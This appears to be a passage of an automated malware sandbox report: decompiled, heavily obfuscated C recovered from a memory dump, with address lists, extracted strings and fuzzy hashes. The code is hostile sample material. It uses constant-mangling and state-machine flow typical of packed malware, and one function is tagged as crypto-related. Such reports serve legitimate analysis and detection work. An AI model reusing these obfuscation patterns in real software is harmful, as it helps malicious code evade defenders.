				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0023BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00244F7D(_v552, _v580, _v540);
										E00244F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00244F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0023F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0023F326();
										E0023F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002317AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x24c910);
												_t378 = E002388E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00244F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0023568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00244F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00238736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x24ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x24ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00238f78
0x00238f7e
0x00238f86
0x00238f8e
0x00238f96
0x00238f9b
0x00238fa3
0x00238fab
0x00238fb3
0x00238fb8
0x00238fbd
0x00238fc5
0x00238fcd
0x00238fd5
0x00238fdd
0x00238fea
0x00238ff1
0x00238ff7
0x00238ffc
0x00239001
0x00239007
0x0023900f
0x00239017
0x0023901f
0x00239024
0x0023902c
0x00239039
0x0023903c
0x00239040
0x00239048
0x00239050
0x0023905b
0x00239066
0x00239071
0x0023907c
0x00239087
0x00239092
0x0023909a
0x002390a2
0x002390a7
0x002390af
0x002390b7
0x002390bf
0x002390c7
0x002390cf
0x002390df
0x002390e8
0x002390eb
0x002390ef
0x002390f4
0x002390fc
0x00239104
0x0023910f
0x00239113
0x0023911b
0x00239123
0x0023912b
0x00239133
0x00239138
0x00239140
0x00239148
0x00239156
0x0023915b
0x00239161
0x00239169
0x00239176
0x00239179
0x0023917d
0x0023918d
0x00239191
0x00239199
0x002391a1
0x002391a6
0x002391ae
0x002391b3
0x002391bb
0x002391c8
0x002391cb
0x002391cf
0x002391d7
0x002391df
0x002391ea
0x002391f5
0x00239200
0x0023920b
0x00239213
0x0023921e
0x00239226
0x00239233
0x00239237
0x0023923f
0x00239247
0x0023924c
0x00239251
0x00239259
0x00239264
0x0023926f
0x0023927a
0x00239285
0x0023928d
0x00239298
0x002392a3
0x002392ae
0x002392b9
0x002392c1
0x002392c9
0x002392d1
0x002392d9
0x002392e6
0x002392e7
0x002392eb
0x002392f3
0x002392fb
0x00239309
0x0023930d
0x00239315
0x0023931d
0x00239325
0x0023932d
0x00239332
0x0023933a
0x00239342
0x0023934a
0x00239352
0x0023935a
0x00239362
0x0023936a
0x00239378
0x00239379
0x00239380
0x00239387
0x0023938b
0x00239393
0x0023939b
0x002393a0
0x002393a8
0x002393b0
0x002393b8
0x002393c2
0x002393c6
0x002393ce
0x002393d6
0x002393db
0x002393e3
0x002393eb
0x002393f3
0x002393fe
0x00239402
0x0023940a
0x00239417
0x0023941b
0x00239423
0x0023942b
0x00239433
0x00239433
0x00239433
0x00239438
0x00239438
0x00239438
0x0023943d
0x0023943d
0x0023943d
0x0023943d
0x0023943f
0x00000000
0x00000000
0x00239445
0x0023955a
0x0023955b
0x0023957f
0x00239584
0x00239589
0x0023959d
0x002395b5
0x002395ba
0x002395bb
0x002395c2
0x002395c9
0x002395d0
0x002395d0
0x002395d6
0x002395d6
0x00239433
0x00239433
0x00239433
0x00000000
0x00239433
0x0023944b
0x00239451
0x00000000
0x002396c1
0x0023945d
0x0023952e
0x00239535
0x00239541
0x00239546
0x0023954b
0x00000000
0x00239463
0x00239469
0x002394d8
0x00239511
0x00000000
0x002394da
0x002394da
0x002394e5
0x002394e7
0x002394f4
0x002394f9
0x002394fe
0x00239506
0x00239433
0x00239433
0x00239433
0x00239438
0x00239438
0x00000000
0x00239438
0x00239433
0x0023946b
0x00239471
0x00000000
0x00239477
0x00239485
0x00239486
0x0023948d
0x00239495
0x0023949b
0x002394b0
0x002394c1
0x002394c7
0x002394c7
0x002394cc
0x00239438
0x00239438
0x00239438
0x00000000
0x00239438
0x0023949d
0x002394a4
0x002394a9
0x00000000
0x002394a9
0x0023949b
0x00239471
0x00239469
0x0023945d
0x002395ec
0x002395f2
0x002395fa
0x00000000
0x00239600
0x00239600
0x00239601
0x0023960e
0x0023960f
0x0023960f
0x0023961a
0x0023961b
0x00239626
0x00239628
0x0023962d
0x00239632
0x00000000
0x00239634
0x00239643
0x00239648
0x0023964d
0x00239654
0x00000000
0x00239654
0x00000000
0x00239632
0x002396cc
0x002396cc
0x002396cc
0x0023965d
0x00239669
0x0023966a
0x0023966d
0x0023966e
0x00239673
0x00239679
0x0023967b
0x00000000
0x0023967b
0x00000000
0x00239679
0x002395e6
0x00239685
0x00239688
0x0023968d
0x00239692
0x00239695
0x0023969a
0x00000000
0x0023969a
0x00000000
0x002396a0
0x002396a0
0x00000000
0x0023943d
0x00239438

Strings

@C, xrefs: 002392D9
`H, xrefs: 002392FB
G1, xrefs: 00239362
s5, xrefs: 0023921E
}a, xrefs: 00239325
b{, xrefs: 002392A3
~\, xrefs: 002391DF
]V, xrefs: 00239050
-, xrefs: 00239342
Ml!, xrefs: 002394E7
fpMl!, xrefs: 0023960F
#, xrefs: 002393CE

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
Instruction ID: aba586bf59d0b92451ed2e30d7337aa23cfed29c4a8f1305e84f95a4b7d844e7
Opcode Fuzzy Hash: 1082b0791201f3e6eafba73c062f4e466b6a6fabc7ac911334da811be6ba858e
Instruction Fuzzy Hash: CD0251B250D3818FE368CF25D54AA4BFBE1BBC4708F50891DF199862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0023E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0023F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00238736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0023B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00243E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002328CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00246319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x24ca30; // 0x0
							E00248A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00238624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00244F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x0023e37d
0x0023e38a
0x0023e393
0x0023e39a
0x0023e39f
0x0023e3a7
0x0023e3ac
0x0023e3b4
0x0023e3bc
0x0023e3c4
0x0023e3c9
0x0023e3d1
0x0023e3d6
0x0023e3de
0x0023e3e6
0x0023e3f6
0x0023e401
0x0023e404
0x0023e408
0x0023e410
0x0023e418
0x0023e41d
0x0023e425
0x0023e42d
0x0023e435
0x0023e43d
0x0023e442
0x0023e44a
0x0023e452
0x0023e45a
0x0023e467
0x0023e46b
0x0023e473
0x0023e47b
0x0023e483
0x0023e48b
0x0023e493
0x0023e49b
0x0023e4a8
0x0023e4ac
0x0023e4b4
0x0023e4c4
0x0023e4c8
0x0023e4d0
0x0023e4d8
0x0023e4e0
0x0023e4e8
0x0023e4f0
0x0023e4f8
0x0023e500
0x0023e505
0x0023e50d
0x0023e515
0x0023e521
0x0023e524
0x0023e528
0x0023e530
0x0023e53b
0x0023e546
0x0023e551
0x0023e559
0x0023e55e
0x0023e563
0x0023e56b
0x0023e573
0x0023e57d
0x0023e582
0x0023e58a
0x0023e592
0x0023e597
0x0023e59f
0x0023e5a7
0x0023e5af
0x0023e5b7
0x0023e5bf
0x0023e5c7
0x0023e5cf
0x0023e5d7
0x0023e5df
0x0023e5e7
0x0023e5ef
0x0023e5f7
0x0023e5ff
0x0023e607
0x0023e60f
0x0023e61e
0x0023e61f
0x0023e629
0x0023e62d
0x0023e635
0x0023e63d
0x0023e645
0x0023e64d
0x0023e655
0x0023e668
0x0023e66f
0x0023e67a
0x0023e682
0x0023e68a
0x0023e68f
0x0023e697
0x0023e69f
0x0023e6a4
0x0023e6ac
0x0023e6bf
0x0023e6c6
0x0023e6d1
0x0023e6dc
0x0023e6e7
0x0023e6f2
0x0023e6fa
0x0023e6ff
0x0023e707
0x0023e712
0x0023e71d
0x0023e728
0x0023e730
0x0023e738
0x0023e73d
0x0023e742
0x0023e74a
0x0023e752
0x0023e75a
0x0023e75f
0x0023e767
0x0023e77a
0x0023e781
0x0023e78c
0x0023e799
0x0023e79d
0x0023e7a5
0x0023e7ad
0x0023e7b5
0x0023e7bd
0x0023e7c5
0x0023e7cd
0x0023e7d5
0x0023e7da
0x0023e7e4
0x0023e7eb
0x0023e7f2
0x0023e7f9
0x0023e7fd
0x0023e805
0x0023e817
0x0023ea0c
0x0023ea13
0x00000000
0x0023ea13
0x0023e823
0x0023e9d2
0x0023e9d3
0x0023e9d9
0x0023e9ea
0x0023e9ed
0x0023e9f4
0x00000000
0x0023e9f4
0x0023e82f
0x0023e9a9
0x0023e9ae
0x0023e9b0
0x0023e9b3
0x0023e9b6
0x0023ea3d
0x0023ea40
0x0023ea49
0x0023ea49
0x0023e9bc
0x00000000
0x0023e9bc
0x0023e83b
0x0023e93e
0x0023e952
0x0023e957
0x0023e959
0x0023e95e
0x0023e963
